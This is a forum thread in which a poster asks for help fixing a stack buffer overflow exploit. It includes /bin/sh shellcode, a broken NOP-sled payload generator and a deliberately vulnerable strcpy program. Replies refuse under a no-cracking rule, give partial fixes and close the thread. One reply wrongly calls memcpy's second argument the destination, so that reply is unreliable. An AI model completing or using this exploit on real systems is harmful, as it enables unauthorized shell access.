Buffer Overflow HELP ! - Errors !

[newbieSecurity]

I am new to buffer overflow; I'm trying to overflow a 517 byte buffer. Using gdb to debug the program, I know that it takes 533 bytes to overflow the ebp and 537 to overflow the eip. I am attempting to fill the buffer with NOPs and shellcode. The input is placed into a "malicious file" and a stack.c program places the information on the stack. I'm trying to overflow the buffer such that I can get the pointer to point to my shellcode in order to run it. Below are my programs, but I am getting some errors with how I am using memcpy to put the NOPs and shellcode into the buffer.

Code:

//VULNERABLE FILE exploit.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char shellcode[]=
    "\x31\xc0"             // xorl    %eax,%eax
    "\x50"                 // pushl   %eax                   
    "\x68""//sh"           // pushl   $0x68732f2f            
    "\x68""/bin"           // pushl   $0x6e69622f            
    "\x89\xe3"             // movl    %esp,%ebx              
    "\x50"                 // pushl   %eax                   
    "\x53"                 // pushl   %ebx                   
    "\x89\xe1"             // movl    %esp,%ecx              
    "\x99"                 // cdql                           
    "\xb0\x0b"             // movb    $0x0b,%al              
    "\xcd\x80"             // int     $0x80                  
;
long get_esp(void){
        __asm__("movl %esp, %eax");//attempting to get the stack pointer address
}

void main(int argc, char **argv)
{
    char buffer[517];
    FILE *maliciousfile;
        long addr;
        addr = get_esp();
    // Initialize buffer with 0x90 (NOP instruction)
    memset(&buffer, 0x90, 517);

    // filling buffer with appropriate contents here
        memcpy(&buffer, 0x90, buffer-strlen(shellcode)); //trying to add NOPs to the buffer
        memcpy(&buffer + buffer-strlen(shellcode), shellcode, strlen(shellcode));  //trying to add shellcode to the buffer
         long *ptr = (long *)(buffer+8);  /*not sure about this part either - buffer is 517 bytes, buffer+4=521 and location of EBP, buffer+8=525 is return address. I'm attempting to place the pointer and subsequently the esp address at the return address in order to read the shellcode*/
        
*ptr = addr; //make eip point to shellcode address


    // Save the contents to the file "malicious file"
   maliciousfile = fopen("./malicious", "w");
   fwrite(buffer, 517, 1, maliciousfile);
   fclose(maliciousfile);
}



//STACK FILE
#include<stdlib.h>
#include<stdio.h>
#include<string.h>

int bof(char *str)
{
        char buffer[12];

        //statement has a buffer overflow problem
        strcpy(buffer, str);

        return 1;
}

int main(int argc, char *argv)
{
        char str[517];
        FILE *maliciousfile;

        badfile = fopen("maliciousfile", "r");
        fread(str, sizeof(char), 517, maliciousfile);
        bof(str);
        printf("Returned Properly\n");
        return 1;
}

ERRORS
exploit.c: In function ‘main’:
exploit.c:34:30: error: invalid operands to binary - (have ‘char *’ and ‘void *’)
exploit.c:34:2: warning: passing argument 2 of ‘memcpy’ makes pointer from integer without a cast
/usr/include/string.h:44:14: note: expected ‘const void * __restrict__’ but argument is of type ‘int’
exploit.c:35:17: error: invalid operands to binary + (have ‘char (*)[517]’ and ‘char *’)

[anduril462]

I'm guessing you either didn't read the forum guidelines (that's a link, click it), or chose to ignore #6.

[newbieSecurity]

It's just shellcode, not actual malicious code, that's just a name I gave it. Wouldn't really consider this hacking but if you all are that strict then I guess.... Thanks for your Help though.

[anduril462]

It's just shellcode, not actual malicious code, that's just a name I gave it. Wouldn't really consider this hacking but if you all are that strict then I guess....

I don't know what else you could consider it, except for the more accurate term, "cracking". Besides, "just shellcode" can be very malicious. Getting illegal shell access (interactive or not) via a buffer overflow reeks of maliciousness. What stops you from replacing the "just shellcode" with something more malicious? And to top it off, you gave no reason why you want to do this, not that any answer would magically make what you're doing okay.

Thanks for your Help though.

You're welcome! I'm glad I could help you learn about the "no cracking" policy here .

[oogabooga]

Two problems. In your use of memset and memcpy, you pass &buffer, but should just pass buffer.

And this simply makes no sense:
memcpy(buffer, 0x90, buffer-strlen(shellcode));
The second param is the destination address. 0x90 ???
You presumably want memset here, although since you've already memset the buffer with 0x90's I'm not sure what you're trying to do.

[Salem]

Closed - as per the rules.